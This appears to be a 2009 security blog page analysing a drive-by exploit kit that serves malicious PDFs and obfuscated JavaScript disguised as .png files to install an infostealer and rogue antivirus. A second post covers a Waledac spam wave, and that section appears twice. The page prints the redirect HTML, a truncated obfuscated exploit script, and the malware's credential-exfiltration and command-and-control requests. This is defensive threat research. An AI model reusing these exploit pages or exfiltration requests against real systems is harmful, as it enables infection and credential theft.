IP/Domain Analysis
IP address 91.212.198.37 is registered to (AS49314 NEVAL PE Nevedomskiy Alexey Alexeevich, Russia). The 91.212.198.0/24 netblock has been associated with various forms of cyber criminal activity.
inetnum: 91.212.198.0 - 91.212.198.255
netname: NEVAL
descr: Individual retailer Nevedomskiy A A
country: RU
org: ORG-IrNA1-RIPE
admin-c: NAA21-RIPE
tech-c: NAA21-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-by: NEVAL-mnt
mnt-lower: RIPE-NCC-END-MNT
mnt-routes: NEVAL-mnt
mnt-domains: NEVAL-mnt
source: RIPE # Filtered
organisation: ORG-IrNA1-RIPE
org-name: Individual retailer Nevedomskiy Alexey Alexeevich
abuse-mailbox: mailto:abuse.lirkz@gmail.com
org-type: OTHER
address: Russian Federation
mnt-ref: NEVAL-mnt
mnt-by: NEVAL-mnt
source: RIPE # Filtered
The IP 91.212.198.37 currently maps to the following domains.
• *.delzzerro.cn
• delzzerro.cn
• updatedate.cn
• www.delzzerro.cn
The domain delzzerro.cn was registered on 17 July 2009.
Domain Name: delzzerro.cn
ROID: 20090717s10001s59929740-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司 (translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-17 02:17
Expiration Date: 2010-07-17 02:17
The domain updatedate.cn was registered on 8 July 2009.
Domain Name: updatedate.cn
ROID: 20090708s10001s08910501-cn
Domain Status: clientTransferProhibited
Registrant Organization: Real Host LTD
Registrant Name: Real Host
Administrative Email:
Sponsoring Registrar: 广东时代互联科技有限公司(translated as Era of the Internet Technology Co., Ltd. Guangdong)
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-07-08 01:51
Expiration Date: 2010-07-08 01:51
The following websites provide historical malicious activity for AS49314, 91.212.198.0/24.
https://zeustracker.abuse.ch/monitor.php?as=49314
http://maliciousnetworks.org/ipinfo.php?as=AS49314&date=2009-07-22
http://www.malwaredomainlist.com/mdl.php?search=49314&colsearch=All&quantity=50 http://www.malwareurl.com/search.php?domain=&s=AS49314&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on
www.delzzerro.cn Analysis
The HTTP request for www.delzzerro.cn returns and iframe and script redirect.
<html>
<head><title>400</title></head>
<body>
<iframe go='400' width=1 src='/pic/p2.php' error='600' height="1"></iframe>
<div id="divid">
<script src='/pic/vq.png'></script>
</body>
</html>
http://www.delzzerro.cn/pic/p2.php
The request for p2.php returns a PDF file.
GET /pic/p2.php HTTP/1.1
Referer: http://www.delzzerro.cn/
Host: www.delzzerro.cn Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Disposition: inline; filename=36.pdf
Content-Type: application/pdf
36.pdf
File: 36.pdf
Size: 27243
MD5: FDCF2B9803F7EF55C9C90BFA7627C0E9
The file 36.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.
• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927
http://www.delzzerro.cn/pic/vq.png
The vq.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).
http://delzzerro.cn/pic/uzp.php
The payload of the collective exploits is a GET request for uzp.php which returns the binary file installb.exe.
GET /pic/uzp.php
Host: delzzerro.cn
HTTP/1.1 200 OK
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream
http://91.212.198.37 Analysis
The HTTP request for 91.212.198.37 returns and iframe, script redirect and exploit code.
<html>
<head><title>404</title></head>
<body>
<iframe g='22' width=1 src='/img/p2.php' l='66' height="1"></iframe>
<script>
fg="%u2121%..;var .%u212.DE%u.1%u.%u.navigat.retVal.ibkka.var ..DE.=..return .5.C9E2.C9.0..C9.u..71.21.functio.A22.29.';.U+.+'.
......TRUNCATED......
split('.');for(J=u.length-1;J>-1;J--)Q[U]=Q[U].split(o[J]).join(u[J]);i8+=Q[U].replace(/./g,'"').replace(/./g,"\\").replace(/./g,"\n")}eval(i8);
</script>
<div id="divid">
<script src='/img/vw.png'></script>
</body>
</html>
http://91.212.198.37/img/p2.php
The request for p2.php returns a PDF file.
GET /img/p2.php
Referer: http://91.212.198.37/
Host: 91.212.198.37
HTTP/1.1 200 OK
Content-Disposition: inline; filename=119.pdf
Content-Type: application/pdf
119.pdf
File: 119.pdf
Size: 27360
MD5: 26A360E37812E6D5CCF31ED06CE692D9
The file 119.pdf contains exploit code targeted against 2 Adobe Reader vulnerabilities.
• Adobe util.printf, CVE-2008-2992
• Adobe getIcon, CVE-2009-0927
http://91.212.198.37/img/vw.png
The vw.png file, which was included in a script tag contains JavaScript. The .png technique is for obfuscation purposes. The JavaScript is used to exploit an Adobe Flash 0day vulnerability (CVE-2009-1862).
updatedate.cn/img/uzt.php
The payload of the collective exploits is a GET request for uzt.php which returns the binary file installb.exe.
GET /img/uzt.php
Host: updatedate.cn
HTTP/1.1 200
Content-Disposition: inline; filename=installb.exe
Content-Type: application/octet-stream
Malware Analysis
installb.exe
The malware installb.exe creates:
• Trojan.Virantix.C (Symantec) which attempts to lower system security settings, kill the process of antivirus applications and install rogue security products.
• PWS:Win32/Daurso (Microsoft) serves as an infostealer that keylogs and exfiltrates user accounts and passwords.
File: installb.exe
Size: 113664
MD5: D9A878871B90C68F4A1A155A3015A8FE
ThreatExpert
VirusTotal (4/41 current detection)
The malware installb.exe creates the following files:
C:\DOCUME~1\%user%\LOCALS~1\Temp\installb[1].exe
File: installb[1].exe
Size: 48128
MD5: 9145DA932AAB97CF50B5DE8DCDF80BE9
C:\WINDOWS\system32\braviax.exe
File: braviax.exe
Size: 11264
MD5: 61FEBE4C32CE9CB0DFCF55D373E0BAFD
VirusTotal (17/41 current detection)
C:\WINDOWS\system32\dllcache\figaro.sys (is later deleted)
C:\WINDOWS\drivers\beep.sys
C:\WINDOWS\system32\dllcache\beep.sys
File: beep.sys
Size: 32768
MD5: B040B5812B6668A232B18D397F721741
VirusTotal (20/38 current detection)
C:\WINDOWS\system32\Wbem\proquota.exe
File: proquota.exe
Size: 35840
MD5: 348BA619AAB3A92B99701335F95FE2A7
ThreatExpert
VirusTotal (5/41 current detection)
proquota.exe (PWS:Win32/Daurso)
The malware proquota.exe (PWS:Win32/Daurso) connects to squatead.com (212.150184.146, AS8584 Barak Netvision 013 Barak – Network, Israel).
POST /ptf/receiver/online HTTP/1.1
Host: squatead.com
The malware proquota.exe monitored and exfiltrated FTP credentials to squatead.com during dynamic analysis.
POST /ptf/receiver/ftp HTTP/1.1
Host: squatead.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Content-Length: 92
ftp_uri_0=p7uojZW2GGxfm637v7nEye4CbV7Y5%2FKP6Y6It1wqCsfk%2BeHqgYCrXA&ftp_source_0=lb250dzwDg
Trojan.Virantix.C
The Trojan.Virantix.C malware connects to komalinovskatas.com (66.79.178.199, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) in order to download the installer for the rogue security product Home Antivirus 2010. The domain komalinovskatas.com was registered on 2009/7/20.
Registrant:
Aleksandr Petrov mailto:radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003
Domain Name:komalinovskatas.com
Record last updated at 2009-07-23 10:32:26
Record created on 2009/7/20
Record expired on 2010/7/20
Home Antivirus 2010 installer download.
GET /?wmid=1025&d=2&it=2&s=24 HTTP/1.1
Host: komalinovskatas.com
HTTP/1.1 302 Found
Location: /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2
GET /2/installer/Installer.exe?u=1025&s=b4eaa65e579e83c2248376cc88de9086&t=2 HTTP/1.1
Host: komalinovskatas.com
HTTP/1.1 200 OK
Content-Disposition: attachment; filename="Install.exe";
The malware install.exe is written as c:\WINDOWS\system32\wisdstr.exe.
File: wisdstr.exe
Size: 181488
MD5: E68A91A3614435882DAAD5494CAE622E
ThreatExpert
The malware wisdstr.exe connects to bureltanovaderta.com (66.79.178.200, AS27645 ASN-NA-MSG-01 Managed Solutions Group, Inc) to download the remaining installation files associated with the rogue security product Home Antivirus 2010. The product provides false diagnostics and persistent notifications in an attempt to convince the victim to purchase a licensed version of the product.
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/HomeAntivirus2010/Binaries1.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAVE.cab HTTP/1.1
GET /files/BinariesAdd.cab HTTP/1.1
GET /files/HomeAntivirus2010/BinariesGUI.cab HTTP/1.1
GET /files/BinariesSC.cab HTTP/1.1
GET /files/BinariesUpd.cab HTTP/1.1
GET / HTTP/1.1
GET /update_inst.php?wmid=1025&subid=b4eaa65e579e83c2248376cc88de9086&pid=2&lid=0&hs=F35A291E6CA636316E72ECAD75594619 HTTP/1.1
The domain bureltanovaderta.com is registered nearly identical to komalinovskatas.com.
Registrant:
Aleksandr Petrov radar@e2mail.ru +7.3412755886
Aleksandr Petrov
ul.Udmurtskaya d.141 kv.110
Izhevsk,Udmurtiya,RUSSIAN FEDERATION 426003
Domain Name:bureltanovaderta.com
Record last updated at 2009-07-24 10:06:32
Record created on 2009/7/20
Record expired on 2010/7/20
An over-sized Windows Security center opens indicating Virus Protection is not found. The window is part of the social; engineering effort to convince victims to purchase a licensed version of Home Antivirus 2010.
The malware also attempted C2 connections to cbbugltjud.com (195.2.253.240, AS12695 MADET-NET Moscow, Russia) to download additional malware. Other domains that resolve to 195.2.253.240 include:
*.cabkyykbbg.com
*.cbbugltjud.com
cabkyykbbg.com
cbbugltjud.com
www.cabkyykbbg.com
www.cbbugltjud.com
GET /progs/xfcgtyylqd/iejwn
Host: cbbugltjud.com
The iejwn download creates c:\alurm.exe.
File: alurm.exe
Size: 11264
MD5: 6BE4585C480B5C840E99BE9B190F7846
ThreatExpert
GET /progs/xfcgtyylqd/ziwwofwj.php
Host: cbbugltjud.com
GET /progs/xfcgtyylqd/czaarfj.php?adv=adv464
Host: cbbugltjud.com
Sunday, July 26, 2009
Tuesday, July 21, 2009
Erin Andrews Peepshow Gone Bad?
This summary is not available. Please
click here to view the post.
Labels:
Alueron,
codec,
Erin Andrews,
FlashCodecPlugin.exe,
MediaPlayer.exe
Wednesday, July 8, 2009
Waledac - July 4th Wave
Keeping up with theme-based spam, Waledac began a new wave for the 4th of July. Shadowserver posted a list of 4th of July themed domains like the following:
fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com
The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:
112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23
sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.
Malware Analysis
File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E
The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe
The following are samples of initial connections to various Waledac controllers.
POST /rbbcrx.png
Host: 119.77.219.219
POST /lbohwj.png
Host: 98.25.97.68
POST / HTTP/1.1
Host: 93.100.114.158
POST /xdryoc.htm
Host: 134.155.241.188
POST /mzrbflwkczf.png
Host: 93.100.114.158
fireworksholiday.com
freeindependence.com
happyindependence.com
holidayfirework.com
The TTP was the standard spam, fake YouTube video and executable download. A sample Waledac spam email hyperlink is for wpyn.fireholiday.com/video.exe. The domain wpyn.fireholiday.com resolves to numerous Fast Flux IP addresses. A quick resolution of the first 50 nodes is below:
112.76.132.115
118.232.163.47
118.34.184.174
124.123.15.55
200.114.156.47
200.75.122.114
200.8.236.97
201.213.101.148
201.75.55.113
204.19.202.167
213.106.51.95
213.63.244.54
213.89.177.19
217.132.89.78
24.56.242.144
24.88.106.240
60.2.41.179
60.244.160.18
61.35.161.29
69.86.53.176
71.12.11.2
71.137.1.103
71.17.123.33
71.230.75.255
77.37.144.56
81.97.199.10
82.1.200.141
82.67.81.223
83.233.163.135
83.233.18.128
84.108.85.123
84.109.209.107
85.201.139.159
85.230.122.138
86.123.150.156
87.116.182.176
88.163.104.87
88.169.133.14
89.136.112.46
89.215.93.163
89.34.67.226
89.74.183.203
89.76.121.249
89.76.52.152
92.53.34.101
92.53.34.101
93.100.87.113
97.89.139.5
98.239.10.9
98.246.19.23
sudosecure.net provides a cool tracking mechanism for Waledac binaries, Fast Flux IP addresses and domains.
Malware Analysis
File: video.exe
Size: 630784
MD5: 1D36E772F9892B64D810978B9A99541E
The Waledac malware video.exe creates a registry key referencing where the file was executed from. In this example, the file was executed from the desktop.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion "RList"
Type: REG_BINARY
Data: (data too large: 6944 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PromoReg"
Type: REG_SZ
Data: C:\Documents and Settings\%User Profile%\Desktop\video.exe
The following are samples of initial connections to various Waledac controllers.
POST /rbbcrx.png
Host: 119.77.219.219
POST /lbohwj.png
Host: 98.25.97.68
POST / HTTP/1.1
Host: 93.100.114.158
POST /xdryoc.htm
Host: 134.155.241.188
POST /mzrbflwkczf.png
Host: 93.100.114.158
Subscribe to:
Posts (Atom)